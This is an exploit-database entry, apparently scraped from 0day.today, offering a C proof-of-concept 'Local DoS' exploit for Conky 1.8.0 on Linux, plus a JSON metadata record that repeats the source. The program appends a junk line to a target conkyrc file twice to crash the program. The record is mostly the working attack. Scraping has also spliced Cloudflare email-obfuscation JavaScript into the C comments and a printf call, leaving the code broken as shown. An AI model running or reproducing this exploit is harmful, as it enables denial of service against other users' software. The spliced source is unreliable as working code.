ID 1337DAY-ID-16334
Type zdt
Reporter Arturo D'Elia
Modified 2011-06-14T00:00:00
Description
Exploit for linux platform in category dos / poc
/* */
/* Vulnerability Conky 1.8.0 on Linux */
/* Tested on: Linux with kernel 2.6.32.1-smp */
/* Found: by Arturo D'Elia */
/* Date found: 12 Dec 2010 */
/* Fix: No Fix */
/* Contacts: [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char killyou[]= "# w000wwwww i exploit it and i kill you!";
int main( int argc, char **argv){
FILE *fp;
/* Write the information program*/
printf("\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\n");
printf("[*] Coded by: Arturo D'Elia\n");
printf("[*] Tested on: Linux\n");
printf("[*] Kernel version: 2.6.32.1-smp\n");
printf("[*] Bug Found: 12 Dec 2010\n");
printf("[*] Contacts: [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>\n\n");
/* Check the input parameter */
if(argc!=2)
exit(fprintf(stderr,"Usage: %s < path conkyrc >\n",argv[0]));
/* Check file exsist */
printf("[>] Open conky configuration\n");
if((fp=fopen(argv[1],"r"))==NULL)
exit(fprintf(stderr,"[x] Cannot open %s file\n",argv[1]));
fclose(fp);
/* Open file for append and i send it the */
/* exploited strings */
fp=fopen(argv[1],"a");
printf("[>] Send the DoS/PoC string\n");
fprintf(fp,"%s\n",killyou);
fclose(fp);
/* Wait 3 seconds */
usleep(3000000);
/* Resend exploited strings */
fp=fopen(argv[1],"a");
fprintf(fp,"%s\n",killyou);
fclose(fp);
/* Ok guy. */
printf("[*] Ok guy, you kill it.\n\n");
return 0;
}
# 0day.today [2018-04-11] #
{"id": "1337DAY-ID-16334", "lastseen": "2018-04-11T19:49:45", "viewCount": 4, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-04-11T19:49:45", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/VNC/ULTRAVNC_VIEWER_BOF", "MSF:AUXILIARY/SCANNER/HTTP/HP_SYS_MGMT_LOGIN", "MSF:EXPLOIT/OSX/AFP/LOGINEXT", "MSF:EXPLOIT/WINDOWS/SSL/MS04_011_PCT", "MSF:EXPLOIT/WINDOWS/PROXY/PROXYPRO_HTTP_GET", "MSF:EXPLOIT/MULTI/HTTP/WP_CROP_RCE"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16334"]}], "modified": "2018-04-11T19:49:45", "rev": 2}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16334", "description": "Exploit for linux platform in category dos / poc", "title": "Conky Linux 1.8.0 Local DoS/PoC Exploit", "cvelist": [], "sourceData": "/* */\r\n/* Vulnerability Conky 1.8.0 on Linux */\r\n/* Tested on: Linux with kernel 2.6.32.1-smp */\r\n/* Found: by Arturo D'Elia */\r\n/* Date found: 12 Dec 2010 */\r\n/* Fix: No Fix */\r\n/* Contacts: [email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script> */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n \r\nchar killyou[]= \"# w000wwwww i exploit it and i kill you!\";\r\n \r\nint main( int argc, char **argv){\r\n \r\n FILE *fp;\r\n \r\n /* Write the information program*/\r\n printf(\"\\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\\n\");\r\n printf(\"[*] Coded by: Arturo D'Elia\\n\");\r\n printf(\"[*] Tested on: Linux\\n\");\r\n printf(\"[*] Kernel version: 2.6.32.1-smp\\n\");\r\n printf(\"[*] Bug Found: 12 Dec 2010\\n\");\r\n printf(\"[*] Contacts: [email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>\\n\\n\");\r\n \r\n /* Check the input parameter */\r\n if(argc!=2)\r\n exit(fprintf(stderr,\"Usage: %s < path conkyrc >\\n\",argv[0]));\r\n \r\n /* Check file exsist */\r\n printf(\"[>] Open conky configuration\\n\");\r\n if((fp=fopen(argv[1],\"r\"))==NULL)\r\n exit(fprintf(stderr,\"[x] Cannot open %s file\\n\",argv[1]));\r\n fclose(fp);\r\n \r\n /* Open file for append and i send it the */\r\n /* exploited strings */\r\n fp=fopen(argv[1],\"a\");\r\n printf(\"[>] Send the DoS/PoC string\\n\");\r\n fprintf(fp,\"%s\\n\",killyou);\r\n fclose(fp);\r\n \r\n /* Wait 3 seconds */\r\n usleep(3000000);\r\n \r\n /* Resend exploited strings */\r\n fp=fopen(argv[1],\"a\");\r\n fprintf(fp,\"%s\\n\",killyou);\r\n fclose(fp);\r\n \r\n /* Ok guy. */\r\n printf(\"[*] Ok guy, you kill it.\\n\\n\");\r\nreturn 0;\r\n}\r\n\r\n\n\n# 0day.today [2018-04-11] #", "published": "2011-06-14T00:00:00", "references": [], "reporter": "Arturo D'Elia", "modified": "2011-06-14T00:00:00", "href": "https://0day.today/exploit/description/16334"}
{}